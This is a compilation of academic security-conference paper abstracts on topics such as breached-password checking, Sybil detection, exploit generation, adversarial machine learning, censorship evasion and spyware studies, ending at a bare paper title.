To prevent credential stuffing attacks, industry best practice now proactively checks if user credentials are present in known data breaches. Recently, some web services, such as HaveIBeenPwned (HIBP) and Google Password Checkup (GPC), have started providing APIs to check for breached passwords. We refer to such services as compromised credential checking (C3) services. We give the first formal description of C3 services, detailing different settings and operational requirements, and we give relevant threat models. One key security requirement is the secrecy of a user’s passwords that are being checked. Current widely deployed C3 services have the user share a small prefix of a hash computed over the user’s password. We provide a framework for empirically analyzing the leakage of such protocols, showing that in some contexts knowing the hash prefixes leads to a 12x increase in the efficacy of remote guessing attacks. We propose two new protocols that provide stronger protection for users’ passwords, implement them, and show experimentally that they remain practical to deploy.

User Account Access Graphs

The primary authentication method for a user account is rarely the only way to access that account. Accounts can often be accessed through other accounts, using recovery methods, password managers, or single sign-on. This increases each account’s attack surface, giving rise to subtle security problems. These problems cannot be detected by considering each account in isolation, but require analyzing the links between a user’s accounts. Furthermore, to accurately assess the security of accounts, the physical world must also be considered. For example, an attacker with access to a physical mailbox could obtain credentials sent by post.

Despite the manifest importance of understanding these interrelationships and the security problems they entail, no prior methods exist to perform an analysis thereof in a precise way. To address this need, we introduce account access graphs, the first formalism that enables a comprehensive modeling and analysis of a user’s entire setup, incorporating all connections between the user’s accounts, devices, credentials, keys, and documents. Account access graphs support systematically identifying both security vulnerabilities and lockout risks in a user’s accounts. We give analysis algorithms and illustrate their effectiveness in a case study, where we automatically detect significant weaknesses in a user’s setup and suggest improvement options.

Detecting Fake Accounts in Online Social Networks at the Time of Registrations

Online social networks are plagued by fake information. In particu- lar, using massive fake accounts (also called Sybils), an attacker can disrupt the security and privacy of benign users by spreading spam, malware, and disinformation. Existing Sybil detection methods rely on rich content, behavior, and/or social graphs generated by Sybils. The key limitation of these methods is that they incur significant delays in catching Sybils, i.e., Sybils may have already performed many malicious activities when being detected. In this work, we propose Ianus, a Sybil detection method that leverages account registration information. Ianus aims to catch Sybils immediately after they are registered. First, using a real- world registration dataset with labeled Sybils from WeChat (the largest online social network in China), we perform a measurement study to characterize the registration patterns of Sybils and benign users. We find that Sybils tend to have synchronized and abnormal registration patterns. Second, based on our measurement results, we model Sybil detection as a graph inference problem, which allows us to integrate heterogeneous features. In particular, we extract synchronization and anomaly based features for each pair of accounts, use the features to build a graph in which Sybils are densely connected with each other while a benign user is isolated or sparsely connected with other benign users and Sybils, and finally detect Sybils via analyzing the structure of the graph. We evaluate Ianus using real-world registration datasets of WeChat. Moreover, WeChat has deployed Ianus on a daily basis, i.e., WeChat uses Ianus to analyze newly registered accounts on each day and detect Sybils. Via manual verification by the WeChat security team, we find that Ianus can detect around 400K per million new registered accounts each day and achieve a precision of over 96% on average.

Session 8A: Attack II

Gollum: Modular and Greybox Exploit Generation for Heap Overflows in Interpreters

We present the first approach to automatic exploit generation for heap overflows in interpreters. It is also the first approach to exploit generation in any class of program that integrates a solution for automatic heap layout manipulation. At the core of the approach is a novel method for discovering exploit primitives—inputs to the target program that result in a sensitive operation, such as a function call or a memory write, utilizing attacker-injected data. To produce an exploit primitive from a heap overflow vulnerability, one has to discover a target data structure to corrupt, ensure an instance of that data structure is adjacent to the source of the overflow on the heap, and ensure that the post-overflow corrupted data is used in a manner desired by the attacker. Our system addresses all three tasks in an automatic, greybox, and modular manner. Our implementation is called GOLLUM, and we demonstrate its capabilities by producing exploits from 10 unique vulnerabilities in the PHP and Python interpreters, 5 of which do not have existing public exploits.

SLAKE: Facilitating Slab Manipulation for Exploiting Vulnerabilities in the Linux Kernel Share on

To determine the exploitability for a kernel vulnerability, a secu- rity analyst usually has to manipulate slab and thus demonstrate the capability of obtaining the control over a program counter or performing privilege escalation. However, this is a lengthy process because (1) an analyst typically has no clue about what objects and system calls are useful for kernel exploitation and (2) he lacks the knowledge of manipulating a slab and obtaining the desired layout. In the past, researchers have proposed various techniques to facilitate exploit development. Unfortunately, none of them can be easily applied to address these challenges. On the one hand, this is because of the complexity of the Linux kernel. On the other hand, this is due to the dynamics and non-deterministic of slab variations. In this work, we tackle the challenges above from two perspectives. First, we use static and dynamic analysis techniques to explore the kernel objects, and the corresponding system calls useful for exploitation. Second, we model commonly-adopted exploitation methods and develop a technical approach to facilitate the slab layout adjustment. By extending LLVM as well as Syzkaller, we implement our techniques and name their combination after SLAKE. We evaluate SLAKE by using 27 real-world kernel vulnerabilities, demonstrating that it could not only diversify the ways to perform kernel exploitation but also sometimes escalate the exploitability of kernel vulnerabilities.

Session 8E: Web Security

HideNoSeek: Camouflaging Malicious JavaScript in Benign ASTs

In the malware field, learning-based systems have become popular to detect new malicious variants. Nevertheless, attackers with specific and internal knowledge of a target system may be able to produce input samples which are misclassified. In practice, the assumption of strong attackers is not realistic as it implies access to insider information. We instead propose HideNoSeek, a novel and generic camouflage attack, which evades the entire class of detectors based on syntactic features, without needing any information about the system it is trying to evade. Our attack consists of changing the constructs of malicious JavaScript samples to reproduce a benign syntax. For this purpose, we automatically rewrite the Abstract Syntax Trees (ASTs) of malicious JavaScript inputs into existing benign ones. In particular, HideNoSeek uses malicious seeds and searches for isomorphic subgraphs between the seeds and traditional benign scripts. Specifically, it replaces benign sub-ASTs by their malicious equivalents (same syntactic structure) and adjusts the benign data dependencies–without changing the AST–so that the malicious semantics is kept. In practice, we leveraged 23 malicious seeds to generate 91,020 malicious scripts, which perfectly reproduce ASTs of Alexa top 10,000 web pages. Also, we can produce on average 14 different malicious samples with the same AST as each Alexa top 10. Overall, a standard trained classifier has 99.98% false negatives with HideNoSeek inputs, while a classifier trained on such samples has over 88.74% false positives, rendering the targeted static detectors unreliable.

Your Cache Has Fallen: Cache-Poisoned Denial-of-Service Attack ✔👍

Web caching enables the reuse of HTTP responses with the aim to reduce the number of requests that reach the origin server, the volume of network traffic resulting from resource requests, and the user-perceived latency of resource access. For these reasons, a cache is a key component in modern distributed systems as it enables applications to scale at large. In addition to optimizing performance metrics, caches promote additional protection against Denial of Service (DoS) attacks. In this paper we introduce and analyze a new class of web cache poisoning attacks. By provoking an error on the origin server that is not detected by the intermediate caching system, the cache gets poisoned with the server-generated error page and instrumented to serve this useless content instead of the intended one, rendering the victim service unavailable. In an extensive study of fifteen web caching solutions we analyzed the negative impact of the CachePoisoned DoS (CPDoS) attack-as we coined it. We show the practical relevance by identifying one proxy cache product and five CDN services that are vulnerable to CPDoS. Amongst them are prominent solutions that in turn cache high-value websites. The consequences are severe as one simple request is sufficient to paralyze a victim website within a large geographical region. The awareness of the newly introduced CPDoS attack is highly valuable for researchers for obtaining a comprehensive understanding of causes and countermeasures as well as practitioners for implementing robust and secure distributed systems.

Session 9A: User Study

Passwords are an often unavoidable authentication mechanism, despite the availability of additional alternative means. In the case of smartphones, usability problems are aggravated because interaction happens through small screens and multilayer keyboards. While password managers (PMs) can improve this situation and contribute to hardening security, their adoption is far from widespread. To understand the underlying reasons, we conducted the first empirical usability study of mobile PMs, covering both quantitative and qualitative evaluations. Our findings show that popular PMs are barely acceptable according to the standard System Usability Scale, and that there are three key areas for improvement: integration with external applications, security, and user guidance and interaction. We build on the collected evidence to suggest recommendations that can fill this gap.

Matched and Mismatched SOCs: A Qualitative Study on Security Operations Center Issues

Organizations, such as companies and governments, created Security Operations Centers (SOCs) to defend against computer security attacks. SOCs are central defense groups that focus on security incident management with capabilities such as monitoring, preventing, responding, and reporting. They are one of the most critical defense components of a modern organization’s defense. Despite their critical importance to organizations, and the high frequency of reported security incidents, only a few research studies focus on problems specific to SOCs. In this study, to understand and identify the issues of SOCs, we conducted 18 semi-structured interviews with SOC analysts and managers who work for organizations from different industry sectors. Through our analysis of the interview data, we identified technical and non-technical issues that exist in SOC. Moreover, we found inherent disagreements between SOC managers and their analysts that, if not addressed, could entail a risk to SOC efficiency and effectiveness. We distill these issues into takeaways that apply both to future academic research and to SOC management. We believe that research should focus on improving the efficiency and effectiveness of SOCs.

A Usability Evaluation of Let’s Encrypt and Certbot: Usable Security Done Right

The correct configuration of HTTPS is a complex set of tasks, which many administrators have struggled with in the past. Let’s Encrypt and Electronic Frontier Foundation’s Certbot aim to improve the TLS ecosystem by offering free trusted certificates (Let’s Encrypt) and by providing user-friendly support to configure and harden TLS (Certbot). Although adoption rates have increased, to date, there has been only a little scientific evidence of the actual usability and security benefits of this semi-automated approach. Therefore, we conducted a randomized control trial to evaluate the usability of Let’s Encrypt and Certbot in comparison to the traditional certificate authority approach. We performed a within-subjects lab study with 31 participants. The study sheds light on the security and usability enhancements that Let’s Encrypt and Certbot provide. We highlight how usability improvements aimed at administrators can have a large impact on security and discuss takeaways for Certbot and other security-related tasks that experts struggle with.

Session 9B: ML Security III

Seeing isn’t Believing: Towards More Robust Adversarial Attack Against Real World Object Detectors

Recently Adversarial Examples (AEs) that deceive deep learning models have been a topic of intense research interest. Compared with the AEs in the digital space, the physical adversarial attack is considered as a more severe threat to the applications like face recognition in authentication, objection detection in autonomous driving cars, etc. In particular, deceiving the object detectors practically, is more challenging since the relative position between the object and the detector may keep changing. Existing works attacking object detectors are still very limited in various scenarios, e.g., varying distance and angles, etc. In this paper, we presented systematic solutions to build robust and practical AEs against real world object detectors. Particularly, for Hiding Attack (HA), we proposed thefeature-interference reinforcement (FIR) method and theenhanced realistic constraints generation (ERG) to enhance robustness, and for Appearing Attack (AA), we proposed thenested-AE, which combines two AEs together to attack object detectors in both long and short distance. We also designed diverse styles of AEs to make AA more surreptitious. Evaluation results show that our AEs can attack the state-of-the-art real-time object detectors (i.e., YOLO V3 and faster-RCNN) at the success rate up to 92.4% with varying distance from 1m to 25m and angles from -60º to 60º. Our AEs are also demonstrated to be highly transferable, capable of attacking another three state-of-the-art black-box models with high success rate.

AdVersarial: Perceptual Ad Blocking meets Adversarial Machine Learning

Perceptual ad-blocking is a novel approach that detects online advertisements based on their visual content. Compared to traditional filter lists, the use of perceptual signals is believed to be less prone to an arms race with web publishers and ad networks. We demonstrate that this may not be the case. We describe attacks on multiple perceptual ad-blocking techniques, and unveil a new arms race that likely disfavors ad-blockers. Unexpectedly, perceptual ad-blocking can also introduce new vulnerabilities that let an attacker bypass web security boundaries and mount DDoS attacks. We first analyze the design space of perceptual ad-blockers and present a unified architecture that incorporates prior academic and commercial work. We then explore a variety of attacks on the ad-blocker’s detection pipeline, that enable publishers or ad networks to evade or detect ad-blocking, and at times even abuse its high privilege level to bypass web security boundaries. On one hand, we show that perceptual ad-blocking must visually classify rendered web content to escape an arms race centered on obfuscation of page markup. On the other, we present a concrete set of attacks on visual ad-blockers by constructing adversarial examples in a real web page context. For seven ad-detectors, we create perturbed ads, ad-disclosure logos, and native web content that misleads perceptual ad-blocking with 100% success rates. In one of our attacks, we demonstrate how a malicious user can upload adversarial content, such as a perturbed image in a Facebook post, that fools the ad-blocker into removing another users’ non-ad content. Moving beyond the Web and visual domain, we also build adversarial examples for AdblockRadio, an open source radio client that uses machine learning to detects ads in raw audio streams.

Attacking Graph-based Classification via Manipulating the Graph Structure

Graph-based classification methods are widely used for security analytics. Roughly speaking, graph-based classification methods include collective classification and graph neural network. Attacking a graph-based classification method enables an attacker to evade detection in security analytics. However, existing adversarial machine learning studies mainly focused on machine learning for non-graph data. Only a few recent studies touched adversarial graph-based classification methods. However, they focused on graph neural network, leaving collective classification largely unexplored. We aim to bridge this gap in this work. We consider an attacker’s goal is to evade detection via manipulating the graph structure. We formulate our attack as a graph-based optimization problem, solving which produces the edges that an attacker needs to manipulate to achieve its attack goal. However, it is computationally challenging to solve the optimization problem exactly. To address the challenge, we propose several approximation techniques to solve the optimization problem. We evaluate our attacks and compare them with a recent attack designed for graph neural networks using four graph datasets. Our results show that our attacks can effectively evade graph-based classification methods. Moreover, our attacks outperform the existing attack for evading collective classification methods and some graph neural network methods.

Latent Backdoor Attacks on Deep Neural Networks

Recent work proposed the concept of backdoor attacks on deep neural networks (DNNs), where misclassification rules are hidden inside normal models, only to be triggered by very specific inputs. However, these “traditional” backdoors assume a context where users train their own models from scratch, which rarely occurs in practice. Instead, users typically customize “Teacher” models already pretrained by providers like Google, through a process called transfer learning. This customization process introduces significant changes to models and disrupts hidden backdoors, greatly reducing the actual impact of backdoors in practice. In this paper, we describe latent backdoors, a more powerful and stealthy variant of backdoor attacks that functions under transfer learning. Latent backdoors are incomplete backdoors embedded into a “Teacher” model, and automatically inherited by multiple “Student” models through transfer learning. If any Student models include the label targeted by the backdoor, then its customization process completes the backdoor and makes it active. We show that latent backdoors can be quite effective in a variety of application contexts, and validate its practicality through real-world attacks against traffic sign recognition, iris identification of volunteers, and facial recognition of public figures (politicians). Finally, we evaluate 4 potential defenses, and find that only one is effective in disrupting latent backdoors, but might incur a cost in classification accuracy as tradeoff.

Session 9E: Web Censorship and Auditing

Geneva: Evolving Censorship Evasion Strategies

Researchers and censoring regimes have long engaged in a cat-and-mouse game, leading to increasingly sophisticated Internet-scale censorship techniques and methods to evade them. In this paper, we take a drastic departure from the previously manual evade-detect cycle by developing techniques to automate the discovery of censorship evasion strategies. We present Geneva, a novel genetic algorithm that evolves packet-manipulation-based censorship evasion strategies against nation-state level censors. Geneva composes, mutates, and evolves sophisticated strategies out of four basic packet manipulation primitives (drop, tamper headers, duplicate, and fragment). With experiments performed both in-lab and against several real censors (in China, India, and Kazakhstan), we demonstrate that Geneva is able to quickly and independently re-derive most strategies from prior work, and derive novel subspecies and altogether new species of packet manipulation strategies. Moreover, Geneva discovers successful strategies that prior work posited were not effective, and evolves extinct strategies into newly working variants. We analyze the novel strategies Geneva creates to infer previously unknown behavior in censors. Geneva is a first step towards automating censorship evasion; to this end, we have made our code and data publicly available.

Conjure: Summoning Proxies from Unused Address Space

Refraction Networking (formerly known as “Decoy Routing”) has emerged as a promising next-generation approach for circumventing Internet censorship. Rather than trying to hide individual circumvention proxy servers from censors, proxy functionality is implemented in the core of the network, at cooperating ISPs in friendly countries. Any connection that traverses these ISPs could be a conduit for the free flow of information, so censors cannot easily block access without also blocking many legitimate sites. While one Refraction scheme, TapDance, has recently been deployed at ISP-scale, it suffers from several problems: a limited number of “decoy” sites in realistic deployments, high technical complexity, and undesirable tradeoffs between performance and observability by the censor. These challenges may impede broader deployment and ultimately allow censors to block such techniques. We present Conjure, an improved Refraction Networking approach that overcomes these limitations by leveraging unused address space at deploying ISPs. Instead of using real websites as the decoy destinations for proxy connections, our scheme connects to IP addresses where no web server exists leveraging proxy functionality from the core of the network. These phantom hosts are difficult for a censor to distinguish from real ones, but can be used by clients as proxies. We define the Conjure protocol, analyze its security, and evaluate a prototype using an ISP testbed. Our results suggest that Conjure can be harder to block than TapDance, is simpler to maintain and deploy, and offers substantially better network performance.

You Shall Not Join: A Measurement Study of Cryptocurrency Peer-to-Peer Bootstrapping Techniques

Cryptocurrencies are digital assets which depend upon the use of distributed peer-to-peer networks. The method a new peer uses to initially join a peer-to-peer network is known as bootstrapping. The ability to bootstrap without the use of a centralized resource is an unresolved challenge. In this paper we survey the bootstrapping techniques used by 74 cryptocurrencies and find that censorship-prone methods such as DNS seeding and IP hard-coding are the most prevalent. In response to this finding, we test two other bootstrapping techniques less susceptible to censorship, Tor and ZMap, to determine if they are operationally feasible alternatives more resilient to censorship. We perform a global measurement study of DNS query responses for each the 92 DNS seeds discovered across 42 countries using the distributed RIPE Atlas network. This provides details of each cryptocurrencies’ peer-to-peer network topology and also highlights instances of DNS outages and query manipulation impacting the bootstrapping process. Our study also reveals that the source code of the cryptocurrencies researched comes from only five main repositories; hence accounting for the inheritance of legacy bootstrapping methods. Finally, we discuss the implications of our findings and provide recommendations to mitigate the risks exposed.

SAMPL: Scalable Auditability of Monitoring Processes using Public Ledgers

Organized surveillance, especially by governments poses a major challenge to individual privacy, due to the resources governments have at their disposal, and the possibility of overreach. Given the impact of invasive monitoring, in most democratic countries, government surveillance is, in theory, monitored and subject to public oversight to guard against violations. In practice, there is a difficult fine balance between safeguarding individual’s privacy rights and not diluting the efficacy of national security investigations, as exemplified by reports on government surveillance programs that have caused public controversy, and have been challenged by civil and privacy rights organizations. Surveillance is generally conducted through a mechanism where federal agencies obtain a warrant from a federal or state judge (e.g., the US FISA court, Supreme Court in Canada) to subpoena a company or service-provider (e.g., Google, Microsoft) for their customers’ data. The courts provide annual statistics on the requests (accepted, rejected), while the companies provide annual transparency reports for public auditing. However, in practice, the statistical information provided by the courts and companies is at a very high level, generic, is released after-the-fact, and is inadequate for auditing the operations. Often this is attributed to the lack of scalable mechanisms for reporting and transparent auditing. In this paper, we present SAMPL, a novel auditing framework which leverages cryptographic mechanisms, such as zero knowledge proofs, Pedersen commitments, Merkle trees, and public ledgers to create a scalable mechanism for auditing electronic surveillance processes involving multiple actors. SAMPL is the first framework that can identify the actors (e.g., agencies and companies) that violate the purview of the court orders. We experimentally demonstrate the scalability for SAMPL for handling concurrent monitoring processes without undermining their secrecy and auditability.

S&P

2018 program dblp

Machine Learning

AI2: Safety and Robustness Certification of Neural Networks with Abstract Interpretation

We present AI2, the first sound and scalable analyzer for deep neural networks. Based on overapproximation, AI2 can automatically prove safety properties (e.g., robustness) of realistic neural networks (e.g., convolutional neural networks).

The key insight behind AI2 is to phrase reasoning about safety and robustness of neural networks in terms of classic abstract interpretation, enabling us to leverage decades of advances in that area. Concretely, we introduce abstract transformers that capture the behavior of fully connected and convolutional neural network layers with rectified linear unit activations (ReLU), as well as max pooling layers. This allows us to handle real-world neural networks, which are often built out of those types of layers.

We present a complete implementation of AI2 together with an extensive evaluation on 20 neural networks. Our results demonstrate that: (i) AI2 is precise enough to prove useful specifications (e.g., robustness), (ii) AI2 can be used to certify the effectiveness of state-of-the-art defenses for neural networks, (iii) AI2 is significantly faster than existing analyzers based on symbolic analysis, which often take hours to verify simple fully connected networks, and (iv) AI2 can handle deep convolutional networks, which are beyond the reach of existing methods.

Manipulating Machine Learning: Poisoning Attacks and Countermeasures for Regression Learning

As machine learning becomes widely used for automated decisions, attackers have strong incentives to manipulate the results and models generated by machine learning algorithms. In this paper, we perform the first systematic study of poisoning attacks and their countermeasures for linear regression models. In poisoning attacks, attackers deliberately influence the training data to manipulate the results of a predictive model. We propose a theoretically-grounded optimization framework specifically designed for linear regression and demonstrate its effectiveness on a range of datasets and models. We also introduce a fast statistical attack that requires limited knowledge of the training process. Finally, we design a new principled defense method that is highly resilient against all poisoning attacks. We provide formal guarantees about its convergence and an upper bound on the effect of poisoning attacks when the defense is deployed. We evaluate extensively our attacks and defenses on three realistic datasets from health care, loan assessment, and real estate domains.

Stealing Hyperparameters in Machine Learning

Hyperparameters are critical in machine learning, as different hyperparameters often result in models with significantly different performance. Hyperparameters may be deemed confidential because of their commercial value and the confidentiality of the proprietary algorithms that the learner uses to learn them. In this work, we propose attacks on stealing the hyperparameters that are learned by a learner. We call our attacks hyperparameter stealing attacks. Our attacks are applicable to a variety of popular machine learning algorithms such as ridge regression, logistic regression, support vector machine, and neural network. We evaluate the effectiveness of our attacks both theoretically and empirically. For instance, we evaluate our attacks on Amazon Machine Learning. Our results demonstrate that our attacks can accurately steal hyperparameters. We also study countermeasures. Our results highlight the need for new defenses against our hyperparameter stealing attacks for certain machine learning algorithms.

A Machine Learning Approach To Prevent Malicious Calls Over Telephony Networks

Malicious calls, i.e., telephony spams and scams, have been a long-standing challenging issue that causes billions of dollars of annual financial loss worldwide. This work presents the first machine learning-based solution without relying on any particular assumptions on the underlying telephony network infrastructures.

The main challenge of this decade-long problem is that it is unclear how to construct effective features without the access to the telephony networks’ infrastructures. We solve this problem by combining several innovations. We first develop a TouchPal user interface on top of a mobile App to allow users tagging malicious calls. This allows us to maintain a large-scale call log database. We then conduct a measurement study over three months of call logs, including 9 billion records. We design 29 features based on the results, so that machine learning algorithms can be used to predict malicious calls. We extensively evaluate different state-of-the-art machine learning approaches using the proposed features, and the results show that the best approach can reduce up to 90% unblocked malicious calls while maintaining a precision over 99.99% on the benign call traffic. The results also show the models are efficient to implement without incurring a significant latency overhead. We also conduct ablation analysis, which reveals that using 10 out of the 29 features can reach a performance comparable to using all features.

Surveylance: Automatically Detecting Online Survey Scams

Online surveys are a popular mechanism for performing market research in exchange for monetary compensation. Unfortunately, fraudulent survey websites are similarly rising in popularity among cyber-criminals as a means for executing social engineering attacks. In addition to the sizable population of users that participate in online surveys as a secondary revenue stream, unsuspecting users who search the web for free content or access codes to commercial software can also be exposed to survey scams. This occurs through redirection to websites that ask the user to complete a survey in order to receive the promised content or a reward.

In this paper, we present SURVEYLANCE , the first system that automatically identifies survey scams using machine learning techniques. Our evaluation demonstrates that SURVEYLANCE works well in practice by identifying 8,623 unique websites involved in online survey attacks. We show that SURVEYLANCE is suitable for assisting human analysts in survey scam detection at scale. Our work also provides the first systematic analysis of the survey scam ecosystem by investigating the capabilities of these services, mapping all the parties involved in the ecosystem, and quantifying the consequences to users that are exposed to these services. Our analysis reveals that a large number of survey scams are easily reachable through the Alexa top 30K websites, and expose users to a wide range of security issues including identity fraud, deceptive advertisements, potentially unwanted programs (PUPs), malicious extensions, and malware .

Understanding Users

Hackers vs. Testers: A Comparison of Software Vulnerability Discovery Processes

Identifying security vulnerabilities in software is a critical task that requires significant human effort. Currently, vulnerability discovery is often the responsibility of software testers before release and white-hat hackers (often within bug bounty programs) afterward. This arrangement can be ad-hoc and far from ideal; for example, if testers could identify more vulnerabilities, software would be more secure at release time. Thus far, however, the processes used by each group - and how they compare to and interact with each other - have not been well studied. This paper takes a first step toward better understanding, and eventually improving, this ecosystem: we report on a semi-structured interview study (n=25) with both testers and hackers, focusing on how each group finds vulnerabilities, how they develop their skills, and the challenges they face. The results suggest that hackers and testers follow similar processes, but get different results due largely to differing experiences and therefore different underlying knowledge of security concepts. Based on these results, we provide recommendations to support improved security training for testers, better communication between hackers and developers, and smarter bug bounty policies to motivate hacker participation.

Towards Security and Privacy for Multi-User Augmented Reality: Foundations with End Users

Immersive augmented reality (AR) technologies are becoming a reality. Prior works have identified security and privacy risks raised by these technologies, primarily considering individual users or AR devices. However, we make two key observations: (1) users will not always use AR in isolation, but also in ecosystems of other users, and (2) since immersive AR devices have only recently become available, the risks of AR have been largely hypothetical to date.
To provide a foundation for understanding and addressing the security and privacy challenges of emerging AR technologies, grounded in the experiences of real users, we conduct a qualitative lab study with an immersive AR headset, the Microsoft HoloLens. We conduct our study in pairs - 22 participants across 11 pairs - wherein participants engage in paired and individual (but physically co-located) HoloLens activities. Through semi-structured interviews, we explore participants’ security, privacy, and other concerns, raising key findings. For example, we find that despite the HoloLens’s limitations, participants were easily immersed, treating virtual objects as real (e.g., stepping around them for fear of tripping). We also uncover numerous security, privacy, and safety concerns unique to AR (e.g., deceptive virtual objects misleading users about the real world), and a need for access control among users to manage shared physical spaces and virtual content embedded in those spaces. Our findings give us the opportunity to identify broader lessons and key challenges to inform the design of emerging single- and multi-user AR technologies.

Computer Security and Privacy for Refugees in the United States

In this work, we consider the computer security and privacy practices and needs of recently resettled refugees in the United States. We ask: How do refugees use and rely on technology as they settle in the US? What computer security and privacy practices do they have, and what barriers do they face that may put them at risk? And how are their computer security mental models and practices shaped by the advice they receive? We study these questions through in-depth qualitative interviews with case managers and teachers who work with refugees at a local NGO, as well as through focus groups with refugees themselves. We find that refugees must rely heavily on technology (e.g., email) as they attempt to establish their lives and find jobs; that they also rely heavily on their case managers and teachers for help with those technologies; and that these pressures can push security practices into the background or make common security “best practices’’ infeasible. At the same time, we identify fundamental challenges to computer security and privacy for refugees, including barriers due to limited technical expertise, language skills, and cultural knowledge–for example, we find that scams as a threat are a new concept for many of the refugees we studied, and that many common security practices (e.g., password creation techniques and security questions) rely on US cultural knowledge. From these and other findings, we distill recommendations for the computer security community to better serve the computer security and privacy needs and constraints of refugees, a potentially vulnerable population that has not been previously studied in this context.

On Enforcing the Digital Immunity of a Large Humanitarian Organization

Humanitarian action, the process of aiding individuals in situations of crises, poses unique information-security challenges due to natural or manmade disasters, the adverse environments in which it takes place, and the scale and multi-disciplinary nature of the problems. Despite these challenges, humanitarian organizations are transitioning towards a strong reliance on the digitization of collected data and digital tools, which improves their effectiveness but also exposes them to computer security threats. In this paper, we conduct a qualitative analysis of the computer-security challenges of the International Committee of the Red Cross (ICRC), a large humanitarian organization with over sixteen thousand employees, an international legal personality, which involves privileges and immunities, and over 150 years of experience with armed conflicts and other situations of violence worldwide. To investigate the computer security needs and practices of the ICRC from an operational, technical, legal, and managerial standpoint by considering individual, organizational, and governmental levels, we interviewed 27 field workers, IT staff, lawyers, and managers. Our results provide a first look at the unique security and privacy challenges that humanitarian organizations face when collecting, processing, transferring, and sharing data to enable humanitarian action for a multitude of sensitive activities. These results highlight, among other challenges, the trade offs between operational security and requirements stemming from all stakeholders, the legal barriers for data sharing among jurisdictions; especially, the need to complement privileges and immunities with robust technological safeguards in order to avoid any leakages that might hinder access and potentially compromise the neutrality, impartiality, and independence of humanitarian action.

The Spyware Used in Intimate Partner Violence

Survivors of intimate partner violence increasingly report that abusers install spyware on devices to track their location, monitor communications, and cause emotional and physical harm. To date there has been only cursory investigation into the spyware used in such intimate partner surveillance (IPS). We provide the first in-depth study of the IPS spyware ecosystem. We design, implement, and evaluate a measurement pipeline that combines web and app store crawling with machine learning to find and label apps that are potentially dangerous in IPS contexts. Ultimately we identify several hundred such IPS-relevant apps. While we find dozens of overt spyware tools, the majority are “dual-use” apps - they have a legitimate purpose (e.g., child safety or anti-theft), but are easily and effectively repurposed for spying on a partner. We document that a wealth of online resources are available to educate abusers about exploiting apps for IPS. We also show how some dual-use app developers are encouraging their use in IPS via advertisements, blogs, and customer support services. We analyze existing anti-virus and anti-spyware tools, which universally fail to identify dual-use apps as a threat.

Networked Systems

Distance-Bounding Protocols: Verification without Time and Location

Distance-bounding protocols are cryptographic protocols that securely establish an upper bound on the physical distance between the participants. Existing symbolic verification frameworks for distance-bounding protocols consider timestamps and the location of agents. In this work we introduce a causality-based characterization of secure distance-bounding that discards the notions of time and location. This allows us to verify the correctness of distance-bounding protocols with standard protocol verification tools. That is to say, we provide the first fully automated verification framework for distance-bounding protocols. By using our framework, we confirmed known vulnerabilities in a number of protocols and discovered unreported attacks against two recently published protocols.

Sonar: Detecting SS7 Redirection Attacks With Audio-Based Distance Bounding

The global telephone network is relied upon by billions every day. Central to its operation is the Signaling System 7 (SS7) protocol, which is used for setting up calls, managing mobility, and facilitating many other network services. This protocol was originally built on the assumption that only a small number of trusted parties would be able to directly communicate with its core infrastructure. As a result, SS7 — as a feature — allows all parties with core access to redirect and intercept calls for any subscriber anywhere in the world. Unfortunately, increased interconnectivity with the SS7 network has led to a growing number of illicit call redirection attacks. We address such attacks with Sonar, a system that detects the presence of SS7 redirection attacks by securely measuring call audio round-trip times between telephony devices. This approach works because redirection attacks force calls to travel longer physical distances than usual, thereby creating longer end-to-end delay. We design and implement a distance bounding-inspired protocol that allows us to securely characterize the round-trip time between the two endpoints. We then use custom hardware deployed in 10 locations across the United States and a redirection testbed to characterize how distance affects round trip time in phone networks. We develop a model using this testbed and show Sonar is able to detect 70.9% of redirected calls between call endpoints of varying attacker proximity (300–7100 miles) with low false positive rates (0.3%). Finally, we ethically perform actual SS7 redirection attacks on our own devices with the help of an industry partner to demonstrate that Sonar detects 100% of such redirections in a real network (with no false positives). As such, we demonstrate that telephone users can reliably detect SS7 redirection attacks and protect the integrity of their calls.

OmniLedger: A Secure, Scale-Out, Decentralized Ledger via Sharding

Designing a secure permissionless distributed ledger (blockchain) that performs on par with centralized payment processors, such as Visa, is a challenging task. Most existing distributed ledgers are unable to scale-out, i.e., to grow their total processing capacity with the number of validators; and those that do, compromise security or decentralization. We present OmniLedger, a novel scale-out distributed ledger that preserves long- term security under permissionless operation. It ensures security and correctness by using a bias-resistant public-randomness protocol for choosing large, statistically representative shards that process transactions, and by introducing an efficient cross- shard commit protocol that atomically handles transactions affecting multiple shards. OmniLedger also optimizes performance via parallel intra-shard transaction processing, ledger pruning via collectively-signed state blocks, and low-latency “trust-but- verify” validation for low-value transactions. An evaluation of our experimental prototype shows that OmniLedger’s throughput scales linearly in the number of active validators, supporting Visa-level workloads and beyond, while confirming typical transactions in under two seconds.

Routing Around Congestion: Defeating DDoS Attacks and Adverse Network Conditions via Reactive BGP Routing

In this paper, we present Nyx, the first system to both effectively mitigate modern Distributed Denial of Service (DDoS) attacks regardless of the amount of traffic under adversarial control and function without outside cooperation or an Internet redesign. Nyx approaches the problem of DDoS mitigation as a routing problem rather than a filtering problem. This conceptual shift allows Nyx to avoid many of the common shortcomings of existing academic and commercial DDoS mitigation systems. By leveraging how Autonomous Systems (ASes) handle route advertisement in the existing Border Gateway Protocol (BGP), Nyx allows the deploying AS to achieve isolation of traffic from a critical upstream AS off of attacked links and onto alternative, uncongested, paths. This isolation removes the need for filtering or de-prioritizing attack traffic. Nyx controls outbound paths through normal BGP path selection, while return paths from critical ASes are controlled through the use of specific techniques we developed using existing traffic engineering principles and require no outside coordination. Using our own realistic Internet-scale simulator, we find that in more than 98% of cases our system can successfully route critical traffic around network segments under transit-link DDoS attacks; a new form of DDoS attack where the attack traffic never reaches the victim AS, thus invaliding defensive filtering, throttling, or prioritization strategies. More significantly, in over 95% of those cases, the alternate path provides complete congestion relief from transit-link DDoS. Nyx additionally provides complete congestion relief in over 75% of cases when the deployer is being directly attacked.

Tracking Ransomware End-to-end

